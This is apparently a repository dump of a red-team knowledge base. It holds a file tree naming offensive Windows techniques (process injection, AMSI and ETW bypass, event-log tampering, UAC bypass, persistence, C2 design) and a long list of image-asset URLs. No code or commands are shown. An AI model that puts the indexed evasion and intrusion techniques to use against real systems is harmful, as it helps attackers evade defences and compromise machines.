├── .gitbook
    └── assets
    │   ├── 1573201562-1.jpg
    │   ├── 20191105203154706.png
    │   ├── 20191105203219229.jpg
    │   ├── 20191105203325446.png
    │   ├── 7b1ba9f08455ed5222a3d9a29f6196a.jpg
    │   ├── 8e4299cbcb7d61402c492f35605f009 (1).jpg
    │   ├── 8e4299cbcb7d61402c492f35605f009.jpg
    │   ├── a.jpg
    │   ├── a.png
    │   ├── autoelevate.png
    │   ├── beacon.jpg
    │   ├── delegateexecute.jpg
    │   ├── filter.png
    │   ├── image (1).png
    │   ├── image (10).png
    │   ├── image (100).png
    │   ├── image (101).png
    │   ├── image (102).png
    │   ├── image (103).png
    │   ├── image (104).png
    │   ├── image (105).png
    │   ├── image (106).png
    │   ├── image (107).png
    │   ├── image (108).png
    │   ├── image (109).png
    │   ├── image (11).png
    │   ├── image (110).png
    │   ├── image (111).png
    │   ├── image (112).png
    │   ├── image (113).png
    │   ├── image (114).png
    │   ├── image (115).png
    │   ├── image (116).png
    │   ├── image (117).png
    │   ├── image (118).png
    │   ├── image (119).png
    │   ├── image (12).png
    │   ├── image (120).png
    │   ├── image (121).png
    │   ├── image (122).png
    │   ├── image (123).png
    │   ├── image (124).png
    │   ├── image (125).png
    │   ├── image (126).png
    │   ├── image (127).png
    │   ├── image (128).png
    │   ├── image (129).png
    │   ├── image (13).png
    │   ├── image (130).png
    │   ├── image (131).png
    │   ├── image (132).png
    │   ├── image (133).png
    │   ├── image (134).png
    │   ├── image (135).png
    │   ├── image (136).png
    │   ├── image (137).png
    │   ├── image (138).png
    │   ├── image (139).png
    │   ├── image (14).png
    │   ├── image (140).png
    │   ├── image (141).png
    │   ├── image (142).png
    │   ├── image (143).png
    │   ├── image (144).png
    │   ├── image (145).png
    │   ├── image (146).png
    │   ├── image (147).png
    │   ├── image (148).png
    │   ├── image (149).png
    │   ├── image (15).png
    │   ├── image (150).png
    │   ├── image (151).png
    │   ├── image (152).png
    │   ├── image (153).png
    │   ├── image (154).png
    │   ├── image (155).png
    │   ├── image (156).png
    │   ├── image (157).png
    │   ├── image (158).png
    │   ├── image (159).png
    │   ├── image (16).png
    │   ├── image (160).png
    │   ├── image (161).png
    │   ├── image (162).png
    │   ├── image (163).png
    │   ├── image (164).png
    │   ├── image (165).png
    │   ├── image (166).png
    │   ├── image (167).png
    │   ├── image (168).png
    │   ├── image (169).png
    │   ├── image (17).png
    │   ├── image (170).png
    │   ├── image (171).png
    │   ├── image (172).png
    │   ├── image (173).png
    │   ├── image (174).png
    │   ├── image (175).png
    │   ├── image (176).png
    │   ├── image (177).png
    │   ├── image (178).png
    │   ├── image (179).png
    │   ├── image (18).png
    │   ├── image (180).png
    │   ├── image (181).png
    │   ├── image (182).png
    │   ├── image (183).png
    │   ├── image (184).png
    │   ├── image (185).png
    │   ├── image (186).png
    │   ├── image (187).png
    │   ├── image (188).png
    │   ├── image (189).png
    │   ├── image (19).png
    │   ├── image (190).png
    │   ├── image (191).png
    │   ├── image (192).png
    │   ├── image (193).png
    │   ├── image (194).png
    │   ├── image (195).png
    │   ├── image (196).png
    │   ├── image (197).png
    │   ├── image (198).png
    │   ├── image (199).png
    │   ├── image (2).png
    │   ├── image (20).png
    │   ├── image (200).png
    │   ├── image (201).png
    │   ├── image (202).png
    │   ├── image (203).png
    │   ├── image (204).png
    │   ├── image (205).png
    │   ├── image (206).png
    │   ├── image (207).png
    │   ├── image (208).png
    │   ├── image (209).png
    │   ├── image (21).png
    │   ├── image (210).png
    │   ├── image (211).png
    │   ├── image (212).png
    │   ├── image (213).png
    │   ├── image (214).png
    │   ├── image (215).png
    │   ├── image (216).png
    │   ├── image (217).png
    │   ├── image (218).png
    │   ├── image (219).png
    │   ├── image (22).png
    │   ├── image (220).png
    │   ├── image (221).png
    │   ├── image (222).png
    │   ├── image (223).png
    │   ├── image (224).png
    │   ├── image (225).png
    │   ├── image (226).png
    │   ├── image (227).png
    │   ├── image (228).png
    │   ├── image (229).png
    │   ├── image (23).png
    │   ├── image (230).png
    │   ├── image (231).png
    │   ├── image (232).png
    │   ├── image (233).png
    │   ├── image (234).png
    │   ├── image (235).png
    │   ├── image (236).png
    │   ├── image (237).png
    │   ├── image (238).png
    │   ├── image (239).png
    │   ├── image (24).png
    │   ├── image (240).png
    │   ├── image (241).png
    │   ├── image (242).png
    │   ├── image (243).png
    │   ├── image (244).png
    │   ├── image (245).png
    │   ├── image (246).png
    │   ├── image (247).png
    │   ├── image (248).png
    │   ├── image (249).png
    │   ├── image (25).png
    │   ├── image (250).png
    │   ├── image (251).png
    │   ├── image (252).png
    │   ├── image (253).png
    │   ├── image (254).png
    │   ├── image (255).png
    │   ├── image (256).png
    │   ├── image (257).png
    │   ├── image (258).png
    │   ├── image (259).png
    │   ├── image (26).png
    │   ├── image (260).png
    │   ├── image (261).png
    │   ├── image (262).png
    │   ├── image (263).png
    │   ├── image (264).png
    │   ├── image (265).png
    │   ├── image (266).png
    │   ├── image (267).png
    │   ├── image (268).png
    │   ├── image (269).png
    │   ├── image (27).png
    │   ├── image (270).png
    │   ├── image (271).png
    │   ├── image (272).png
    │   ├── image (273).png
    │   ├── image (274).png
    │   ├── image (275).png
    │   ├── image (276).png
    │   ├── image (277).png
    │   ├── image (278).png
    │   ├── image (279).png
    │   ├── image (28).png
    │   ├── image (280).png
    │   ├── image (281).png
    │   ├── image (282).png
    │   ├── image (283).png
    │   ├── image (284).png
    │   ├── image (285).png
    │   ├── image (286).png
    │   ├── image (287).png
    │   ├── image (288).png
    │   ├── image (289).png
    │   ├── image (29).png
    │   ├── image (290).png
    │   ├── image (291).png
    │   ├── image (3).png
    │   ├── image (30).png
    │   ├── image (31).png
    │   ├── image (32).png
    │   ├── image (33).png
    │   ├── image (34).png
    │   ├── image (35).png
    │   ├── image (36).png
    │   ├── image (37).png
    │   ├── image (38).png
    │   ├── image (39).png
    │   ├── image (4).png
    │   ├── image (40).png
    │   ├── image (41).png
    │   ├── image (42).png
    │   ├── image (43).png
    │   ├── image (44).png
    │   ├── image (45).png
    │   ├── image (46).png
    │   ├── image (47).png
    │   ├── image (48).png
    │   ├── image (49).png
    │   ├── image (5).png
    │   ├── image (50).png
    │   ├── image (51).png
    │   ├── image (52).png
    │   ├── image (53).png
    │   ├── image (54).png
    │   ├── image (55).png
    │   ├── image (56).png
    │   ├── image (57).png
    │   ├── image (58).png
    │   ├── image (59).png
    │   ├── image (6).png
    │   ├── image (60).png
    │   ├── image (61).png
    │   ├── image (62).png
    │   ├── image (63).png
    │   ├── image (64).png
    │   ├── image (65).png
    │   ├── image (66).png
    │   ├── image (67).png
    │   ├── image (68).png
    │   ├── image (69).png
    │   ├── image (7).png
    │   ├── image (70).png
    │   ├── image (71).png
    │   ├── image (72).png
    │   ├── image (73).png
    │   ├── image (74).png
    │   ├── image (75).png
    │   ├── image (76).png
    │   ├── image (77).png
    │   ├── image (78).png
    │   ├── image (79).png
    │   ├── image (8).png
    │   ├── image (80).png
    │   ├── image (81).png
    │   ├── image (82).png
    │   ├── image (83).png
    │   ├── image (84).png
    │   ├── image (85).png
    │   ├── image (86).png
    │   ├── image (87).png
    │   ├── image (88).png
    │   ├── image (89).png
    │   ├── image (9).png
    │   ├── image (90).png
    │   ├── image (91).png
    │   ├── image (92).png
    │   ├── image (93).png
    │   ├── image (94).png
    │   ├── image (95).png
    │   ├── image (96).png
    │   ├── image (97).png
    │   ├── image (98).png
    │   ├── image (99).png
    │   ├── image-20191107163603543.png
    │   ├── image-20191108093201207.png
    │   ├── image-20191108094338812.png
    │   ├── image-20191108094417009.png
    │   ├── image-20191108100755257.png
    │   ├── image-20191108100831250.png
    │   ├── image-20191108104747560.png
    │   ├── image-20210615113754347.png
    │   ├── image-20210615113817201.png
    │   ├── image-20210615113856114.png
    │   ├── image.png
    │   ├── listener.jpg
    │   ├── lj.jpg
    │   ├── opencmd.jpg
    │   ├── pi-zhu-20200326-105427 (1).jpg
    │   ├── pi-zhu-20200326-105427.jpg
    │   ├── pi-zhu-20200326-113729.jpg
    │   ├── pi-zhu-20200326-122609.jpg
    │   ├── powershell.png
    │   ├── process-hollowing.gif
    │   ├── processs-mon.png
    │   ├── remote.gif
    │   ├── shi-yi-tu-.jpg
    │   ├── tasks (1).jpg
    │   ├── tasks.jpg
    │   ├── uacflowchart.png
    │   └── windows-version.png
├── README.md
├── SUMMARY.md
├── code-and-dll-process-injection
    ├── .net-fan-she-jia-zai.md
    ├── apc-and-nttestalert-code-execute.md
    ├── apc-injection.md
    ├── apc-thread-hijack.md
    ├── bypass-session-0-injection.md
    ├── clipboard-data-deliver.md
    ├── createremotethread.md
    ├── divide-and-conquer.md
    ├── dll-hollowing.md
    ├── early-bird-and--createremotethread.md
    ├── early-bird.md
    ├── mapping-injection.md
    ├── process-hollowing.md
    ├── seh-code-execute.md
    ├── setcontext-hijack-thread.md
    ├── tls-code-execute.md
    ├── untitled.md
    └── writefile-offset-table-generate-shellcode.md
├── defense-evasion
    ├── .net-fan-she-jia-zai.md
    ├── apihook-and-dllinjection-bypass-amsi.md
    ├── avtive-call-api.md
    ├── cobaltstrike-argue.md
    ├── cobaltstrike-executeassembly-realization.md
    ├── compile-time-obfuscation.md
    ├── dynamic-get-syscallid.md
    ├── fake-commandline.md
    ├── fake-ppid.md
    ├── fuck-eventlog.md
    ├── hex-execute.md
    ├── ji-yu-duan-lian-de-dll-yin-cang.md
    ├── load-ntdll-too.md
    ├── memory-pacth-bypass-amsi.md
    ├── memory-pacth-bypass-etw.md
    ├── overwrite-winapi-bypassav.md
    ├── reflectivedllinjection-variation.md
    ├── reload-ntdll-.text-section.md
    ├── reverse-strings-bypass-av.md
    ├── rregistry-check-virtualmachine.md
    ├── shadowmove-emersion-and-think.md
    ├── simple-separate-bypassav.md
    ├── unlink-module-hide.md
    ├── using-antivirus-to-delete-files.md
    └── wow64-and-cross-bit-process-injection.md
├── emergency-response
    └── fuck-wannamine4.0.md
├── persistence
    ├── api-add-user.md
    ├── detous-inline-hook.md
    ├── dll-hijack.md
    ├── find-file.md
    ├── get-computer-installed-software.md
    ├── registry-startup.md
    ├── rid-hijack.md
    ├── simple-cc.md
    ├── startup-service.md
    └── zhu-ji-te-zheng-bang-ding-mu-ma.md
├── privilege-escalation
    ├── bypassuac-fodhelper.md
    ├── code-dll-injection-privilege-escalation.md
    ├── com-bypassuac.md
    ├── dll-hijack-bypassuac.md
    ├── privilege-escalation-ppid.md
    ├── privilege-escalation-service.md
    └── token-manipulation.md
├── redteam-research
    ├── netuseradd-ni-xiang.md
    └── untitled.md
├── weapon-design
    ├── c2-manuscript
    │   ├── README.md
    │   ├── heap-jia-mi.md
    │   ├── real-manuscript.md
    │   ├── real-uml.md
    │   └── shu-ju-da-bao-fang-shi.md
    ├── idoknow.md
    └── xian-zhan-ge-wei-zhi.md
└── weaponization
    ├── bof-weaponization.md
    ├── com-weaponization.md
    ├── go-xiang-mu-fan-she-gai-zao.md
    └── vulnbins-de-li-yong-vuln-driver.md


/.gitbook/assets/1573201562-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/1573201562-1.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/20191105203154706.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/20191105203154706.png


--------------------------------------------------------------------------------
/.gitbook/assets/20191105203219229.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/20191105203219229.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/20191105203325446.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/20191105203325446.png


--------------------------------------------------------------------------------
/.gitbook/assets/7b1ba9f08455ed5222a3d9a29f6196a.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/7b1ba9f08455ed5222a3d9a29f6196a.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/8e4299cbcb7d61402c492f35605f009 (1).jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/8e4299cbcb7d61402c492f35605f009 (1).jpg


--------------------------------------------------------------------------------
/.gitbook/assets/8e4299cbcb7d61402c492f35605f009.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/8e4299cbcb7d61402c492f35605f009.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/a.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/a.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/a.png


--------------------------------------------------------------------------------
/.gitbook/assets/autoelevate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/autoelevate.png


--------------------------------------------------------------------------------
/.gitbook/assets/beacon.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/beacon.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/delegateexecute.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/delegateexecute.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/filter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/filter.png


--------------------------------------------------------------------------------
/.gitbook/assets/image (1).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (1).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (10).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (10).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (100).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (100).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (101).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (101).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (102).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (102).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (103).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (103).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (104).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (104).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (105).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (105).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (106).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (106).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (107).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (107).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (108).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (108).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (109).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (109).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (11).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (11).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (110).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (110).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (111).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (111).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (112).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (112).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (113).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (113).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (114).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (114).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (115).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (115).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (116).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (116).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (117).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (117).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (118).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (118).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (119).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (119).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (12).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (12).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (120).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (120).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (121).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (121).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (122).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (122).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (123).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (123).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (124).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (124).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (125).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (125).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (126).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (126).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (127).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (127).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (128).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (128).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (129).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (129).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (13).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (13).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (130).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (130).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (131).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (131).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (132).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (132).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (133).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (133).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (134).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (134).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (135).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (135).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (136).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (136).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (137).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (137).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (138).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (138).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (139).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (139).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (14).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (14).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (140).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (140).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (141).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (141).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (142).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (142).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (143).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (143).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (144).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (144).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (145).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (145).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (146).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (146).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (147).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (147).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (148).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (148).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (149).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (149).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (15).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (15).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (150).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (150).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (151).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (151).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (152).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (152).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (153).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (153).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (154).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (154).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (155).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (155).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (156).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (156).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (157).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (157).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (158).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (158).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (159).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (159).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (16).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (16).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (160).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (160).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (161).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (161).png


